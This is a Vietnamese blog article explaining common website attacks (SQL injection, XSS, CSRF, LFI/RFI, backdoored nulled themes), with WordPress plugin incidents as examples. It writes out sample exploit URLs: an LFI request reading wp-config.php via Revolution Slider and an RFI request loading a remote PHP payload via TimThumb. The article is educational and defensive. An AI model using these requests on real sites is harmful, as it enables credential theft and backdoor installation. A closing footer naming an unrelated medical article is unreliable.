Đây là cách thức tấn công Website phổ biến nhất, nó là nguyên nhân chính khiến cho ‘bảo mật Website’ là cuộc chiến trường kỳ, không bao giờ có EndGame.

Mọi ngôn ngữ lập trình đều có điểm mạnh, điểm yếu nên luôn có các phương thức bảo mật để tránh bị hacker lợi dụng.

Vấn đề là các phần mềm, mã nguồn website không thể tự tạo ra mà được code bằng ‘cơm’, nên những lỗ hổng bảo mật – từ sơ đẳng đến hiếm gặp ngày ngày được tạo ra.

Làm developer có dễ không?

Một bạn mới học lập trình, nảy ra ý tưởng về một app với tính năng ‘thú vị’, bèn code ngay và đưa nó lên Store, nhiều người thấy app thú vị nên tải về dùng.

Một anh chàng mới học làm Web WordPress, nghĩ ra một tính năng hay, code ngay một plugin và share cho cộng đồng dùng. Thấy plugin gọn nhẹ mà hay, nhiều người cài đặt và sử dụng một cách thích thú…

Nhưng, code không đơn giản chỉ là thực thi ‘tính năng nào đó’ như mọi người tưởng. Cùng một tính năng, nhưng nếu không hiểu về các cơ chế bảo mật trong lập trình, chúng ta hoàn toàn có thể tạo ra các lỗ hổng để hacker tấn công vào Website.

Rất nhiều ứng dụng, addons/ plugins/ extension… được tạo ra từ những developer tay mơ, kèm theo đó là những lỗi sơ đẳng về bảo mật, xử lý hiệu năng và các lỗi tương thích…

Với người dùng bình thường, họ chỉ quan tâm tới tính năng hay chứ đâu cần biết nó có an toàn không.

Trong thế giới WordPress, hàng triệu Website vẫn vô tư dùng các plugin chỉ có vài reviews trên WP Repository, những plugin được chia sẻ trong những nhóm người dùng nhỏ (ví dụ các plugin do người dùng VN tạo ra để thêm tính năng cho Woo, Flatsome…).

Superman cũng là con người

Mọi Coder đều có lúc bất cẩn, chủ quan. Chưa kể có những vấn đề phát sinh từ thực tế sử dụng nên lỗ hổng bảo mật trong Code luôn luôn xuất hiện.

Vô số các trang Web lớn (kể cả web của Nhà Trắng) gặp sự cố bảo mật, như Facebook gần đây – hacker lợi dụng một số tính năng để ăn cắp – xâm phạm data của người dùng.

Trong WordPress, từ mã nguồn WordPress core, các theme khủng Newspaper by Tagdiv, Porto, Avada hay các plugin Revolution Slider, Contact Form 7, Fancy Box… đều từng có những lỗi bảo mật nghiêm trọng.

Nên cái quan trọng nhất không phải là chọn CMS, theme, plugin… nào không có lỗi bảo mật – mà là “lỗi bảo mật xuất hiện khi nào và cách nào để phòng tránh – khắc phục lỗi bảo mật”

Để hiểu hơn về tấn công vào lỗ hổng bảo mật trên mã nguồn, chúng ta sẽ điểm qua các phương pháp tấn công phổ biến nhât nhiện nay qua lỗi bảo mật trên code.

Dựa vào lỗi bảo mật trong code truy vấn cơ sở dữ liệu SQL, hacker chỉ cần cố tình sử dụng các giá trị và truy vấn đặc biệt để truy xuất – chỉnh sửa – thêm – xóa các dữ liệu trong database.

Trong hình là một ví dụ về tấn công lỗ hổng SQL, khi code không có cơ chế kiểm tra bảo mật chặc chẽ, truy vấn với tham số luôn đúng “1=1” sẽ khiến server trả về tất cả các kết quả hiện có trên database.

Lỗi SQL Injection chiếm một tỉ lệ lớn trong các vụ hack website, và gây ra tác hại rất nghiêm trọng vì khi can thiệp được vào database, hacker gần như nắm toàn quyền kiểm soát website của bạn.

Các cuộc tấn công SQL Injection nổi tiếng

Hầu hết các CMS phổ biến đều đã từng dính các lỗi SQLi, như Magento core, Joomla, Drupal… và vBulleting.

Trong WordPres, gần đây các plugin nổi tiếng như Duplicate Page, Ninja Form, Advanced Custom Form 7 DB, bbPress,…

Nổi tiếng nhất là các cuộc tấn công diện rộng vào lỗ hổng SQLi trên WP Statistics và WP NextGEN Gallery năm 2017, gây ảnh hưởng cả trăm nghìn Websites.

3.2 Cross-Site Scripting (XSS)

Kiểu tấn công này nhằm vào lỗ ổng bảo mật trên code, nhưng dùng các lệnh thực thi phía Client Site (phía người dùng).

Các lệnh mà Hacker dùng thường là các ngôn ngữ client side như Javascript(JS), VBScript hay Flash, HTML… hiện nay thì phổ biến nhất là JS và HTML.

Mục đích của các đoạn mã JS, HTML là:

Ăn cắp cookie của người dùng: cookie này dùng để xác thực danh tính khi đăng nhập vào tài khoản trên các website, có được cookie này, hacker có thể hack vào tài khoản của bạn trên các website đang đăng nhập.

Các loại XSS Attack

Reflected XSS (non – persistant)

Hacker llừa người dùng nhấp vào các đường link của website họ đang đăng nhập.

Ví dụ người dùng đang đăng nhập vào chúng tôi thì hacker sẽ gởi cho họ một đường link tương tự nhưng kèm các tham số để thực thi lện js do hacker tạo ra.

Cụ thể ” https://vietcombank.com.vn/+ js code “

Nếu trang web được code kém bảo mật, không check và làm sạch các tham số trên ULR, thì các lệnh “js code” của hacker sau khi được xử lý bởi Server sẽ trả về trình duyệt thực thi ngay trên trình duyệt của người dùng, và lệnh “js code” này thường có nhiệm vụ ăn cắp và gởi cookie trên trình duyệt tới server của hacker.

Có cookie này hacker sẽ login vào chính tài khoản của người dùng trên chúng tôi mà không cần phải có username & mật khẩu.

Tất nhiên cookie chỉ còn hiệu lực nếu phiên làm việc (session) của người dùng vẫn còn, nếu người dùng đã đăng xuất khỏi chúng tôi trước khi nhấp vào link do hacker gởi thì cookie đó không còn sử dụng để login được nữa.

Cách tấn công này phụ thuộc vào trình độ ‘lừa’ của hacker và sự bất cẩn từ người dùng!

Stored XSS

Stored XSS là kiểu tấn công mà các đoạn mã js được chèn vào code, database của Website luôn. Khi người dùng truy cập vào các tác vụ tương ứng, mã js sẽ thực thi và đánh cắp cookie hoặc đưa các thông tin lừa đảo, redirect sang web xấu..

Kiểu tấn công này hiệu quả cao vì không cần lừa người dùng nhấp vào link nào cả, chỉ cần họ vào trang web có tác vụ bị gài mã js là ok.

Trong WordPress, Stored XSS là lỗi được khai thác thường xuyên nhất, có thể kể đến WordPress phiên bản 5.0.x, Social Warfare, Jetpack, Akismet, bbPress…

DOM-based XSS

Một kỹ thuật tấn công XSS mới, cho phép hacker thay đổi cấu trúc DOM của trang web, khi người dùng nhấp vào phần nội dung thêm vào này, các đoạn mã js độc hại sẽ thực thi.

Nó tương tự với Reflected XSS nhưng thay vì gởi về Server để xử lý và phản hồi lại cho trình duyệt, thì DOM-based XSS thực thi ngay trên trình duyệt mà không cần phải gởi về Servers để xử lý lệnh.

Tác hại của XSS Attack

Kỹ thuật XSS Attack & chống XSS Attack là một trong những kỹ thuật cơ bản trong bảo mật.

Vì code bằng ‘cơm’ nên lỗi XSS có thể gặp ở bất kỳ coder nào, nên XSS attack vẫn còn là kiểu tấn công phổ biến – hiệu quả trong tương lai.

Nạn nhân trực tiếp của XSS Attack chính là người dùng, nhưng nạn nhân gián tiếp và bị ảnh hưởng nặng nề chính là Website dính lỗi XSS.

Người dùng sẽ quay lưng với Website sau khi bị tấn công, ăn cắp dữ liệu…

Nếu mã độc được đưa vào database (Stored XSS) thì Google và các trình duyệt sẽ cấm cửa luôn trang web hoặc toàn bộ Website.

3.3 Cross-Site Request Forgery (CSRF/ XSRF)

Cách thức tấn công CSRF dễ nhầm lẫn với XSS, vì nó dùng thủ đoạn lừa người dùng thực hiện một tác vụ mà chỉ có họ mới có quyền thực hiện.

Tuy nhiên, với XSS – kẻ tấn công thực hiện các lệnh bằng JS ngay trên trình duyệt người dùng. Còn với CSRF – kẻ tấn công gởi các lệnh tới để lừa người dùng thực hiện – các lệnh này có thể là các tác vụ thực hiện trên Server.

Ví dụ, bạn đang đăng nhập vào https://wpbanquyen.com, hacker sẽ gởi cho bạn một link như sau:

https://wpbanquyen.com/account?new_password=abc123

Sau khi nhấp vào link, bạn đã thực hiện đổi pass sang abc123 mà không hề biết, lệnh này chỉ có bạn khi đăng nhập mới có quyền thực thi. Thế là hacker dùng pass mới để login vào tài khoản của bạn.

Cách này cũng dùng để chiếm đoạt tiền. Ví dụ bạn đang login vào tài khoản ở ngân hàng Vietcombank, và khi đó, hacker bằng cách nào đó gởi cho bạn một đường link với một cái ảnh (được set kích thước 0.0 để ẩn tấm ảnh đi):

Khi nhấp vào link này, bạn thực hiện lệnh chuyển 1000 vào tài khoản vuihocweb trên cùng hệ thống ngân hàng Vietcombank…

Hiện nay các Website lớn đều có cơ chế chống tấn công CSRF, nhưng vẫn còn vô số lổ hổng để hacker lợi dụng, nên cuộc chiến bảo mật luôn rất căng thẳng.

Lỗi CSRF trên WordPress 5.0.x

Rất may là đội ngũ chuyên gia của Automattic đã nhanh chóng update WordPress lên 5.1.0 để fix lỗ hổng này nên các cuộc tấn công nghiêm trọng đã không xảy ra.

3.4 Inclusion Vulnerabilities: LFI and RFI

Cách thức tấn công cũng dựa vào lỗ hổng bảo mật trên code Website – tức tấn công vào mã nguồn trên máy chủ, hacker sẽ lợi dụng các tính năng được lập trình kém – không bảo mật của App, Website… để thực thi các đoạn mã độc có chủ ý.

Trong thế giới WordPress, cách thức tấn công này cực kỳ phổ biến và thường xuyên. Hacker đặc biệt thích thú với các theme, plugin nổi tiếng, nhiều người dùng vì số lượng nạn nhân đông đảo. Ngay cả WordPress core cũng là mục tiêu của loại tấn công này.

Tấn công LFI – Local File Inclusion là gì?

LFI Attack là kiểu tấn công dựa vào lỗ hổng bảo mật trên code, hacker sẽ thực thi các tác vụ khác có sẵn trên code hoặc xem các thông tin không được phép – đây là các tác vụ chúng ta không muốn thực thi vì bảo mật & ảnh hưởng đến hiệu suất của máy chủ.

Ví dụ, khi ta viết code để mở một file ảnh, thì hacker sẽ mở luôn một file khác trên server (ví dụ file cấu hình hosting, website..).

Lỗ hổng bảo mật LFI của Revolution Slider

Tiêu biểu là sự cố bảo mật của plugin nổi tiếng Revolution Slider năm 2014 – khiến hàng triệu website bị ảnh hưởng. Lỗ hổng trên code khiến hacker hoặc bất kỳ ai cũng có thể mở file cấu hình chúng tôi theo đường link sau:

http://webbihack.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

File cấu hình chúng tôi chứa các thông tin cài đặt của database, key bảo mật. Với các thông tin này hacker có thể thực hiện nhiều cuộc tấn công nguy hiểm tới Website.

Từ các thông tin cấu hình WordPress, và tính năng update của Revolution Slider, hacker chèn backdoor vào code và thực hiện các tác vụ gây hại khác.

Tấn công RFI – Remote File Inclusion là gì?

RFT – tương tự LFI Attack, nhưng được thực hiện bằng cách gọi một File khác nằm ngoài máy chủ (Remote File).

Cách tấn công này hậu quả còn nghiêm trọng hơn LFI, vì remote File là các đoạn code mà hacker làm chủ, họ có thể làm mọi thứ với các đoạn mã này.

Lỗ hổng RFI và cái chết của TimThumb

Tiêu biểu của cuộc tấn công này là sự cố Timthumb – plugin số 1 cho resize ảnh WordPress những năm trước đây.

Lợi dụng lỗi bảo mật trong file chúng tôi hacker có thể upload mã độc từ một file php lưu trữ ở một server bất kỳ (thường giả mạo dưới dạng dịch vụ cdn, dns). Ví dụ:

http://webbihack.com/wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=http://a57fc3picasa.complex.dyndns-pics.com/pics/pics.php

File php này sẽ giúp hacker cài backdoor và tấn công mọi thứ còn lại trên Website.

Sự cố này được xem là ‘kinh điển’ bởi số lượng Website bị ảnh hưởng lên đến hàng triệu, với rất nhiều Website lớn. Phần còn lại thì vẫn chịu tác động lâu dài các năm sau, vì không để ý đến sự kiện này, hoặc có biết nhưng nghĩ mình không bị ảnh hưởng, dù backdoor đã được cài vào – chỉ chờ một thời điểm thích hợp để hacker làm điều họ muốn sau này.

Sự cố nghiêm trọng đã giết chết một trong những plugin khủng nhất thế giới. Và để lại nhiều bài học hữu ích cho cộng đồng WordPress về sau.

4. Phát tán Code có gài mã độc

Một trong những cách thức tấn công chắc chắn hiệu quả, dễ làm mà bạn chỉ cần xin ở đâu đó đoạn code ‘backdoor’ hoặc malware là có thể sưu tập được danh sách nạn nhân khổng lồ.

Thế giới source code free trên mạng cực kỳ hỗn tạp, mà hacker lẫn các anh chàng tốt bụng đều góp công vào việc phát tán mã độc.

Bạn có thể tìm hàng nghìn Website chia sẻ mã nguồn PHP, CMS, WordPress Themes – Plugins… dưới các cái tên crack, nulled, gpl,…

Tìm hiểu Theme GPL là gì?

Số người dùng code từ các trang chia sẻ này có thể lên đến hàng chục triệu, … chưa kể số người được người quen, bạn bè, ‘đồng râm’ trên các diễn đàn, group chia sẻ cho nhau các resources này…

Với hacker, mua một phần mềm, theme, plugin rồi chèn malware vào rồi phát tán là việc quá dễ dàng. Việc này giống như phát miễn phí cho bạn các ổ khóa thông minh, để rồi hacker muốn vào nhà bạn lúc nào tùy thích.

Website bị hack khi dùng theme, plugin từ dlwordpress Trong topic sau chúng ta sẽ tìm hiểu về các loại Malware có trên Website.

5. Hack vào thiết bị lưu trữ thông tin tài khoản

Nhưng, nếu bạn sở hữu Website, lưu trữ thông tin login trên đt, laptop… mà bị mất hoặc bị hack… hoặc có dịp gởi đi sửa chữa…

Hãy cẩn thận, nếu gặp sự cố thì nhanh tay đổi ngay thông tin login hosting/ vps, domain, quản trị Website.

Tổng kết

Bảo mật Website là một vấn đề phức tạp và liên tục đổi mới, cuộc chiến giữa developer – hacker không bao giờ ngừng và điều cần thiết là chúng ta phải luôn luôn cập nhật các tin tức bảo mật – các lỗ hổng mới (Code Vulnerability – SQL Injection…) để thực hiện các phương pháp bảo mật mới nhất – và xử lý kịp thời khi có sự cố.

Trong topic sau, chúng ta sẽ tìm hiểu về thứ hacker thường để lại sau khi hack Website – đó là Malware – các loại malware phổ biến nhất và cách thức chúng tấn công vào Website – đặc biệt là WordPress!

Bạn đang xem bài viết Không Có Tim Thai Và Những Nguyên Nhân Phổ Biến / 2023 trên website Kichcauhocvan.net. Hy vọng những thông tin mà chúng tôi đã chia sẻ là hữu ích với bạn. Nếu nội dung hay, ý nghĩa bạn hãy chia sẻ với bạn bè của mình và luôn theo dõi, ủng hộ chúng tôi để cập nhật những thông tin mới nhất. Chúc bạn một ngày tốt lành!